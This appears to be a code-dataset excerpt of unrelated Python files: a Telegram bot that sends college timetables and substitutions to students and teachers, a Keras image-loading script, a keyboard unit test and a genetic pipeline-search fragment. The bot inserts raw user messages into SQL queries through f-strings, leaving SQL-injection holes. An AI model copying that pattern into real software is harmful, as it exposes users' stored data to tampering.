today_day==5):\n cikl = 30\n cikl1 = 100\n elif (chisl == 'Знаменатель' and today_day==6): \n cikl = 100\n cikl1 = 36\n elif (chisl == 'Числитель' and today_day == 0):\n cikl = 36\n cikl1 =42\n elif (chisl == 'Числитель' and today_day==1):\n cikl = 42\n cikl1 = 48\n elif (chisl == 'Числитель' and today_day==2): \n cikl = 48\n cikl1 = 54 \n elif (chisl == 'Числитель' and today_day==3):\n cikl = 54\n cikl1 = 60\n elif (chisl == 'Числитель' and today_day==4):\n cikl = 60\n cikl1 = 66\n elif (chisl == 'Числитель' and today_day==5):\n cikl = 66\n cikl1 = 100\n elif (chisl == 'Числитель' and today_day==6): \n cikl = 100 \n cikl1 = 0\n key = cikl + 6\n key1 = cikl1 + 6\n\n####################\n##Основные функции##\n####################\n@dp.message_handler(commands='start')\nasync def start(message : types.Message):\n cur.execute(f'INSERT OR REPLACE INTO users VALUES(\"{message.from_user.id}\",\"0\",\"0\")')\n conn.commit()\n texter = 'Добро пожаловать в petroshedulebot, мои создатели:\\nБерозко Роман\\nАверин Андрей\\n\\nCтуденты группы 39-55'\n await bot.send_photo(message.from_user.id, \n 'https://www.directum.ru/application/images/catalog/34597121.PNG', \n texter, \n reply_markup=keyboard.button_register,\n )\n await message.answer(f'Сегодня: {today}\\n{days_naming[today_day]}')\n\n\n@dp.message_handler(text=['Регистрация'])\nasync def register(message: types.Message):\n await bot.send_message(message.from_user.id,'Кто ты?',\n reply_markup=keyboard.button_who,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":school_satchel:\", use_aliases=True)}Я студент'])\nasync def student_register(message: types.Message):\n await States.group.set()\n await bot.send_message(message.from_user.id,\n 'Напиши номер своей группы',\n )\n\n\n@dp.message_handler(state=States.group)\nasync def group_number(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n global group\n data['group'] = message.text\n await bot.send_message(message.chat.id, \n md.text(md.text('Ваша группа:', \n md.bold(data['group']))), \n parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup= keyboard.button_go_main\n )\n grouper = md.text(md.text(md.bold(data['group'])))\n data = markdown(grouper)\n group = ''.join(BeautifulSoup(data).findAll(text=True))\n print(group)\n cur.execute(f'UPDATE users SET group_number = \"{group}\" WHERE user_id = \"{message.from_user.id}\"')\n conn.commit()\n await state.finish()\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":mortar_board:\", use_aliases=True)}Я преподаватель'])\nasync def teacher_register(message: types.Message):\n cur.execute(f'INSERT OR REPLACE INTO prepods VALUES(\"{message.from_user.id}\",\"0\",\"0\")')\n conn.commit()\n await States.fio.set()\n await bot.send_message(message.from_user.id, 'Укажите свои ФИО как в расписании\\nПример: Фамилия И.О.')\n\n\n@dp.message_handler(state=States.fio)\nasync def fio(message: types.Message, state: FSMContext):\n async with state.proxy() as names:\n global fiot\n names['fiot'] = message.text\n await bot.send_message(message.chat.id, \n md.text(md.text('Ваше ФИО:', \n md.bold(names['fiot']))), \n parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup= keyboard.button_go_main\n )\n grouper = md.text(md.text(md.bold(names['fiot'])))\n names = markdown(grouper)\n fiot = ''.join(BeautifulSoup(names).findAll(text=True))\n print(fiot)\n cur.execute(f'UPDATE prepods SET prep_name = \"{fiot}\" WHERE user_id = \"{message.from_user.id}\"')\n conn.commit()\n await state.finish()\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":wrench:\", use_aliases=True)}Настройки', f'{emoji.emojize(\":wrench:\", use_aliases=True)}Назад в настройки'])\nasync def setting(message: types.Message):\n await message.answer('Добро пожаловать в меню настроек', \n reply_markup=keyboard.button_notify,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":card_index:\", use_aliases=True)}Сменить группу'])\nasync def rewrite (message: types.Message):\n await States.group.set()\n await message.answer('Введите новый номер группы:')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":name_badge:\", use_aliases=True)}Сменить ФИО'])\nasync def rewrite_fio (message: types.Message):\n await States.fio.set()\n await message.answer('Введите новое ФИО\\nПример: Фамилия И.О.')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":clock1:\", use_aliases=True)}Время уведомлений', 'Время уведомлений'])\nasync def time_quest (message: types.Message):\n await message.answer('После смены времени нужно будет снова включить уведомления\\nВведите время в формате: 00:00')\n await States.setting.set()\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":ballot_box_with_check:\", use_aliases=True)}Вкл/Выкл уведомлений'])\nasync def time_set (message: types.Message):\n cur.execute(f'SELECT * FROM users WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n time = [list(result[0])[2]][0]\n global x\n global y\n x = x + 1\n if x == 2:\n x = 0\n if x == 0:\n await message.answer ('Уведомления отключены')\n if x == 1 and y == 1:\n await message.answer('Уведомления на пары след. дня включены')\n await scheduler(message, time)\n elif x == 1 and y == 0:\n await message.answer('Уведомления на пары текущего дня включены')\n await scheduler_td(message, time)\n \n\n@dp.message_handler(state=States.setting)\nasync def times_setting_set (message: types.Message, state = FSMContext):\n async with state.proxy() as times:\n global x\n x = 0\n times['times_set'] = message.text\n await bot.send_message(message.chat.id, \n md.text(md.text('Установленное время:', \n md.bold(times['times_set']))), \n parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup= keyboard.button_notify\n )\n timers = md.text(md.text(md.bold(times['times_set'])))\n rework = markdown(timers)\n setted_time = ''.join(BeautifulSoup(rework).findAll(text=True))\n cur.execute(f'UPDATE users SET notify_times = \"{setted_time}\" WHERE user_id = \"{message.from_user.id}\"')\n cur.execute(f'UPDATE prepods SET notify_times = \"{setted_time}\" WHERE user_id = \"{message.from_user.id}\"')\n conn.commit()\n await state.finish()\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":book:\", use_aliases=True)}Пары на сегодня/завтра'])\nasync def change_day(message: types.Message):\n await message.answer('На какой день вы хотите получать расписание в установленное время?',\n reply_markup=keyboard.btn_change_day,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":notebook:\", use_aliases=True)}На сегодня'])\nasync def pare_today(message: types.Message):\n global y\n y = 0\n await message.answer('Вы будете получать уведомление на текущий день')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":notebook_with_decorative_cover:\", use_aliases=True)}На завтра'])\nasync def pare_next_day(message: types.Message):\n global y\n y = 1\n await message.answer('Вы будете получать уведомление на следующий день')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":clipboard:\", use_aliases=True)}Получить расписание'])\nasync def schedule_menu(message: types.Message):\n await message.answer('Выберите на какой день получить расписание', \n reply_markup=keyboard.button_schedule_choise,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":page_facing_up:\", use_aliases=True)}Расписание на сегодня'])\nasync def schedule_today(message: types.Message):\n await week()\n global cikl, key\n if(cikl==100):\n await message.answer('Нет расписания на воскресенье')\n else:\n try:\n para_num = 1\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM users WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n stud = pd.read_excel(f'stud_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.xlsx')\n s1 =(stud[f'{[list(result[0])[1]][0]}'].tolist())\n group_num = [list(result[0])[1]][0]\n text = ''\n while cikl < key:\n skip = str(s1[cikl])\n if (skip == 'nan'):\n text = f'{text}\\n\\n{para_num} пара:\\n -'\n cikl = cikl + 1\n para_num = para_num + 1\n else:\n text = f'{text}\\n\\n{para_num} пара:\\n {s1[cikl]}'\n cikl = cikl + 1\n para_num = para_num + 1\n await message.answer(text)\n try:\n i = '1'\n num_para = ''\n conn = sqlite3.connect('zamen.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE groups LIKE \"%{group_num}%\"')\n res1 = cur.fetchall()\n b1 = \"\"\n first_lession = ''\n schet = 0\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n conn = sqlite3.connect('zamen1.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE groups LIKE \"%{group_num}%\"')\n res1 = cur.fetchall()\n schet = 0\n num_para = ''\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n \n except Exception as ext:\n print(ext)\n await message.answer(f'{first_lession}{b1}')\n\n\n except Exception:\n try:\n para_num = 1\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM prepods WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n stud = pd.read_excel(f'prep_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.xlsx')\n s1 =(stud[f'{[list(result[0])[1]][0]}'].tolist())\n prepodavat = [list(result[0])[1]][0]\n text = ''\n skip = ''\n while cikl < key:\n skip = str(s1[cikl])\n if (skip == 'nan'):\n text = f'{text}\\n\\n{para_num} пара:\\n -'\n cikl = cikl + 1\n para_num = para_num + 1\n else:\n text = f'{text}\\n\\n{para_num} пара:\\n {s1[cikl]}'\n cikl = cikl + 1\n para_num = para_num + 1\n await message.answer(text)\n try:\n conn = sqlite3.connect('zamen.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE para_zam LIKE \"%{prepodavat}%\"')\n res1 = cur.fetchall()\n b1 = \" \"\n i = '1'\n first_lession = ''\n schet = 0\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n conn = sqlite3.connect('zamen1.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE para_zam LIKE \"%{prepodavat}%\"')\n res1 = cur.fetchall()\n schet = 0\n num_para = ''\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n except Exception as ext:\n print(ext)\n await message.answer(f'{first_lession}{b1}')\n except Exception:\n await message.answer('Если вы не получили расписание проверьте профиль')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":page_with_curl:\", use_aliases=True)}Расписание на завтра'])\nasync def schedule_next_day(message: types.Message):\n await week()\n global cikl1, key1\n if(cikl1==100):\n await message.answer('Нет расписания на воскресенье')\n else:\n try:\n para_num = 1\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM users WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n stud = pd.read_excel(f'stud_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.xlsx')\n s1 =(stud[f'{[list(result[0])[1]][0]}'].tolist())\n group_num = [list(result[0])[1]][0]\n skip = ''\n text = ''\n while cikl1 < key1:\n skip = str(s1[cikl1])\n if (skip == 'nan'):\n text = f'{text}\\n\\n{para_num} пара:\\n -'\n cikl1 = cikl1 + 1\n para_num = para_num + 1\n else:\n text = f'{text}\\n\\n{para_num} пара:\\n {s1[cikl1]}'\n cikl1 = cikl1 + 1\n para_num = para_num + 1\n await message.answer(text)\n try:\n i = '1'\n conn = sqlite3.connect('zamen_next.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE groups LIKE \"%{group_num}%\"')\n res1 = cur.fetchall()\n b1 = \" \"\n first_lession = ''\n num_para = ''\n schet = 0\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n conn = sqlite3.connect('zamen_next1.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE groups LIKE \"%{group_num}%\"')\n res1 = cur.fetchall()\n schet = 0\n num_para = ''\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n except Exception as ext:\n print(ext)\n await message.answer(f'{first_lession}{b1}')\n\n except Exception:\n try:\n para_num = 1\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM prepods WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n stud = pd.read_excel(f'prep_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.xlsx')\n s1 =(stud[f'{[list(result[0])[1]][0]}'].tolist())\n prepodavat = [list(result[0])[1]][0]\n skip = ''\n text = ''\n while cikl1 < key1:\n skip = str(s1[cikl1])\n if (skip == 'nan'):\n text = f'{text}\\n\\n{para_num} пара:\\n -'\n cikl1 = cikl1 + 1\n para_num = para_num + 1 \n else:\n text = f'{text}\\n\\n{para_num} пара:\\n {s1[cikl1]}'\n cikl1 = cikl1 + 1\n para_num = para_num + 1\n await message.answer(text)\n try:\n i = '1'\n num_para = ''\n first_lession = ''\n conn = sqlite3.connect('zamen_next.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE para_zam LIKE \"%{prepodavat}%\"')\n res1 = cur.fetchall()\n b1 = \" \"\n schet = 0\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n conn = sqlite3.connect('zamen_next1.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM raspis WHERE para_zam LIKE \"%{prepodavat}%\"')\n res1 = cur.fetchall()\n schet = 0\n num_para = ''\n for row in res1:\n schet = schet + 1\n a1 = f\"Группа: {row[0]}\"\n a2 = f'Номер пары: {row[1]}'\n a3 = f'Пара по расписанию: {row[2]}'\n a4 = f'Пара по замене: {row[3]}'\n b1 = b1 + f'Замена:{schet}\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n num_para = str(a2)\n if num_para.__contains__(i):\n first_lession = first_lession + f'{emoji.emojize(\":exclamation:\", use_aliases=True)}ЗАМЕНА НА ПЕРВУЮ ПАРУ{emoji.emojize(\":exclamation:\", use_aliases=True)}:\\n{a1}\\n{a2}\\n{a3}\\n{a4}\\n\\n'\n except Exception as ext:\n print(f'Bad zamen today prepodavat\\n{ext}')\n await message.answer(f'{first_lession}{b1}')\n except Exception as ext:\n await message.answer('Если вы не получили расписание проверьте профиль')\n\n\n@dp.message_handler(text=['Перейти в главное меню', 'Вернутся в главное меню', f'{emoji.emojize(\":arrow_left:\", use_aliases=True)}Назад', 'Назад'])\nasync def main_menu (message: types.Message):\n global x\n if x == 0:\n sost = f\"Выкл{emoji.emojize(':ballot_box_with_check:', use_aliases=True)}\"\n if x == 1:\n sost = f\"Вкл{emoji.emojize(':white_check_mark:', use_aliases=True)}\"\n await bot.send_message(message.from_user.id, \n f'Добро пожаловать в главное меню.\\nЗдесь вы можете настроить уведомления\\nА также получить расписание вручную\\n\\nСостояние уведомлений: {sost}\\n\\n{emoji.emojize(\":exclamation:\", use_aliases=True)}ЧТОБЫ ПОЛУЧАТЬ РАСПИСАНИЕ НА ПРЕПОДАВАТЕЛЯ У ВАС НЕ ДОЛЖЕН БЫТЬ УСТАНОВЛЕН НОМЕР ГРУППЫ{emoji.emojize(\":exclamation:\", use_aliases=True)}', \n reply_markup=keyboard.button_main,\n )\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":briefcase:\", use_aliases=True)}Мой профиль'])\nasync def get_profile(message: types.Message):\n await message.answer('Какой профиль вам нужен?', reply_markup=keyboard.button_stpr)\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":school_satchel:\", use_aliases=True)}Студент'])\nasync def student (message: types.Message):\n try:\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM users WHERE user_id = \"{message.from_user.id}\"')\n result = cur.fetchall()\n await bot.send_message(message.from_user.id, f'Студент:\\nID = {list(result[0])[0]}\\nGroup = {[list(result[0])[1]][0]}\\nTime = {[list(result[0])[2]][0]}')\n except Exception:\n await message.answer('Пользователь не найден, пожалуйста пройдите регистрацию снова написав:\\n/start')\n\n\n@dp.message_handler(text=[f'{emoji.emojize(\":mortar_board:\", use_aliases=True)}Преподаватель'])\nasync def profile1 (message:types.Message):\n try:\n conn = sqlite3.connect('users_database.db')\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM prepods WHERE user_id = \"{message.from_user.id}\"')\n result1 = cur.fetchall()\n await bot.send_message(message.from_user.id, f'Преподаватель:\\nID = {list(result1[0])[0]}\\nФИО = {[list(result1[0])[1]][0]}\\nTime = {[list(result1[0])[2]][0]}')\n except Exception:\n await message.answer('Пользователь не найден, пожалуйста пройдите регистрацию снова написав:\\n/start')\n\n\n@dp.message_handler(text=f'{emoji.emojize(\":email:\", use_aliases=True)}Помощь')\nasync def user_help (message: types.Message):\n photo = ['https://sun9-45.userapi.com/impg/L_ZjDqZoxr0-Ps0fQi0-c48PjJ-UWJk64exZqw/HrcqjPtfIjE.jpg?size=840x737&quality=96&sign=e78ad3ba428e817729e80c0f02d249df&type=album', \n 'https://sun9-30.userapi.com/impg/S-bSLtCaDlC1bcUwMCDlCAyzerrNVqFgw5Ygpg/BoLXpwQ1HcY.jpg?size=608x770&quality=96&sign=e101f67bcaa95f1aec2d52a651d24cef&type=album', \n 'https://sun9-64.userapi.com/impg/v9TI88OR_8UV_CJ2u2FRJlSjFiRhpoh_lFKSFg/jPCHxw5V4WQ.jpg?size=1125x1077&quality=96&sign=b62f3c74fd48e7831d66add4eb792715&type=album',\n ]\n await bot.send_photo(message.from_user.id, photo[random.randint(0,2)])\n await message.answer('Отправить сообщение разработчикам:\\n /msgtadm\\nПройти регистрацию с самого начала: \\n /start\\n\\n©Author', reply_markup = keyboard.btn_back)\n \n#dop commands\n@dp.message_handler(commands=['msgtadm'])\nasync def msgtoadmins(message: types.Message):\n await message.answer('Укажите в настройках ник телеграм, чтобы мы смогли вам ответить)\\nВаше сообщение:')\n await States.sndmsg.set()\n\n\n@dp.message_handler(state=States.sndmsg)\nasync def msgtoadminist(message: types.Message, state= FSMContext):\n try:\n async with state.proxy() as msg:\n msg['bef'] = message.text\n bef = md.text(md.text(md.bold(msg['bef'])))\n reworkbef = markdown(bef)\n tgo = ''.join(BeautifulSoup(reworkbef).findAll(text=True))\n await bot.send_message(admin_id, f'{message.from_user.username}\\nНаписал:\\n{tgo}')\n await bot.send_message(admin2_id, f'{message.from_user.username}\\nНаписал:\\n{tgo}')\n await state.finish()\n except Exception as ext:\n print(ext)\n await message.answer('Сообщение не доставлено одному из администраторов но вам в скором времени ответят')\n await state.finish()\n\n\n@dp.message_handler(text=f'{emoji.emojize(\":exclamation:\", use_aliases=True)}Внимание')\nasync def waern (message: types.Message):\n await started()\n global message_for_see\n await message.answer(message_for_see, reply_markup=keyboard.btn_back)\n\n\n@dp.message_handler(text=\"Изменения\")\nasync def changes (message: types.Message):\n sender = InputFile('/home/author/horde/table.txt', 'zameni_today.txt')\n await bot.send_document(message.from_user.id, sender)\n\n#####################\n##Админские функции##\n#####################\n@dp.message_handler(commands=['adm1_set'])\nasync def Adm1_set(message: types.message, state=FSMContext):\n await States.adm1_set.set()\n await message.answer('Message for user:')\n\n\n@dp.message_handler(state=States.adm1_set)\nasync def Adm1_setting(message: types.message, state=FSMContext):\n try:\n if admin_id == f'{message.from_user.id}' or admin2_id == f'{message.from_user.id}':\n async with state.proxy() as usr:\n global reworks\n usr['bef'] = message.text\n bef = md.text(md.text(md.bold(usr['bef'])))\n reworkbef = markdown(bef)\n reworks = ''.join(BeautifulSoup(reworkbef).findAll(text=True))\n await bot.send_message(message.from_user.id, reworks)\n await state.finish()\n else:\n await message.answer('This command admin only') \n except Exception as ext:\n print(f'Bad1\\n{ext}')\n\n\n@dp.message_handler(commands=['adm1'])\nasync def Adm1(message: types.message, state=FSMContext):\n await States.adm1.set()\n await message.answer('user_id:')\n \n\n@dp.message_handler(state=States.adm1)\nasync def Adm1_st(message: types.message, state=FSMContext):\n try:\n if admin_id == f'{message.from_user.id}' or admin2_id == f'{message.from_user.id}':\n async with state.proxy() as usr:\n global reworks\n usr['us_id'] = message.text\n bef = md.text(md.text(md.bold(usr['us_id'])))\n rew = markdown(bef)\n rework1 = ''.join(BeautifulSoup(rew).findAll(text=True))\n await bot.send_message(rework1,reworks)\n await state.finish()\n else:\n await message.answer('This command admin only') \n except Exception as ext:\n print (f\"bad\\n{ext}\")\n\n\n@dp.message_handler(commands=['start_f'])\nasync def start_f (message: types.Message):\n while True:\n await search()\n await asyncio.sleep(300)\n await buti()\n await asyncio.sleep(3600)\n \n\n@dp.message_handler(commands=['adm_usr_list'])\nasync def userlist (message: types.Message):\n if admin_id == f'{message.from_user.id}' or admin2_id == f'{message.from_user.id}':\n await bot.send_document(message.from_user.id, dbfile)\n else:\n await message.answer('Admins only') \n\n#@dp.message_handler(commands=['usr_notify'])\n#async def userlist (message: types.Message):\n# try:\n# conn = sqlite3.connect('users_database.db')\n# cur = conn.cursor()\n# cur.execute(f'SELECT * FROM users WHERE user_id')\n# res = cur.fetchall\n# for str in res:\n# try:\n# cur.execute(f'SELECT {str} FROM users WHERE user_id')\n# result = cur.fetchone\n# await bot.send_message(result, '1')\n# except Exception as ext:\n# print(ext) \n# except Exception as ext:\n# print(f'Bad all notify\\n{ext}')\n#\n\n####################################\n##Расписание уведомлений и запуска##\n####################################\nasync def scheduler(message: types.Message, time):\n global x\n try:\n aioschedule.every().day.at(time).do(schedule_next_day, message)\n while x == 1:\n await aioschedule.run_pending()\n await asyncio.sleep(1)\n except Exception as ext:\n print (f'Trouble with schedule\\n{ext}')\n\nasync def scheduler_td(message: types.Message, time):\n global x\n try:\n aioschedule.every().day.at(time).do(schedule_today, message)\n while x == 1:\n await aioschedule.run_pending()\n await asyncio.sleep(1)\n except Exception as ext:\n print (f'Trouble with schedule\\n{ext}')\n\n\n@dp.message_handler(commands=['test'])\nasync def test(message:types.Message):\n print(\"test\")\n\n###############\n##Сабпроцессы##\n###############\nasync def search():\n subprocess.Popen(['python3', 'take_resp.py'])\n\nasync def buti():\n subprocess.Popen(['python3', 'butify.py'])\n\n\nif __name__=='__main__':\n executor.start_polling(dp, skip_updates=True)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":38189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"344172017","text":"import numpy as np\nimport os\nimport time\nfrom resnet50 import ResNet50\nfrom keras.preprocessing import image\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout,Activation,Flatten\n\nfrom imagenet_utils import preprocess_input\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom keras.utils import np_utils\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nprint(\"done\")\n#%%\nimg_path = 'elephant.jpg'\nimg = image.load_img(img_path, target_size=(224, 224))\nx = image.img_to_array(img)\nprint(x.shape)\nx = np.expand_dims(x, axis=0)\nprint(x.shape)\nx = preprocess_input(x)\nprint('Input image shape:', x.shape)\n\n# Loading the training data\nPATH = os.getcwd()\n# Define data path\ndata_path = PATH + '/data'\ndata_dir_list = os.listdir(data_path)\n\nimg_data_list = []\n\nfor dataset in data_dir_list:\n\timg_list = os.listdir(data_path+'/' + dataset)\n\tprint('Loaded the images of dataset-'+'{}\\n'.format(dataset))\n\tfor img in img_list:\n\t\timg_path = data_path + '/' + dataset + '/' + img\n\t\timg = image.load_img(img_path, target_size=(224, 224))\n\t\tx = image.img_to_array(img)\n\t\tx = np.expand_dims(x, axis=0)\n\t\tx = preprocess_input(x)\n\t\tprint('Input image shape:', x.shape)\n\t\timg_data_list.append(x)\n\nimg_data = np.array(img_data_list)\n#img_data = img_data.astype('float32')\nprint(img_data.shape)\nimg_data = np.rollaxis(img_data, 1, 0)\nprint(img_data.shape)\nimg_data = img_data[0]\nprint(img_data.shape)\n\n\n# Define the number of classes\nnum_classes = 4\nnum_of_samples = img_data.shape[0]\nlabels = np.ones((num_of_samples,), dtype='int64')\n\nlabels[0:202] = 0\nlabels[202:404] = 1\nlabels[404:606] = 2\nlabels[606:] = 3\n\n\n","sub_path":"jupyther_code.py","file_name":"jupyther_code.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"289697208","text":"from Keyboard import Listener, Button\n# from pynput.keyboard import Key, Controller\nfrom pynput.keyboard import Key, Controller as KeyboardController\nimport unittest\nimport os\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nget_input = ''\ndef mock_input(topics,cmd,default = None):\n global get_input\n get_input = '{topics}: {CMD} received'.format(topics = str(topics), CMD = str(cmd))\nF_Button = Button('f',{'topics':'console','on_cmd':'Hello World','off_cmd':'Fuck World','args':[]},callback=mock_input,button_type='trigger')\nbuttons = [F_Button]\n\nclass KeyboardTestCase(TestCase):\n\n # get_input will bind to callback during this test\n def test_Button(self):\n global get_input, buttons\n listener = Listener(buttons)\n listener.start()\n os.system(\"stty -echo\")\n keyboard = KeyboardController()\n keyboard.press('f')\n # with self.assertRaises(Exception):\n expected_input = '{topics}: {CMD} received'.format(topics = str('console'), CMD = str('Hello World'))\n self.assertEqual(get_input,\n expected_input,'Keyboard test failed : expected value {0} actual value {1}'.format(get_input, expected_input))\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Keyboard_test.py","file_name":"Keyboard_test.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21228020","text":"from deap import creator, base, tools, gp\nimport random\nimport numpy as np\nimport pandas as pd\nfrom construction_pipeline.models import preprocessing_models, selection_models, classification_models\nfrom copy import deepcopy,copy\n# from sklearn import preprocessing\n# from sklearn import feature_selection\nimport sklearn\n# from sklearn import ensemble\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.model_selection import cross_val_score, train_test_split\nfrom inspect import types\nfrom sklearn.model_selection import GridSearchCV\nfrom time import time\n\ndef random_value_from(obj, name):\n if isinstance(getattr(obj, name), np.ndarray):\n return random.choice(getattr(obj, name))\n else:\n return getattr(obj, name)\n\nclass GeneticBase(object):\n def __init__(self, generations=100, population_size=100, offspring_size=None):\n self.generations = generations\n self.population_size = 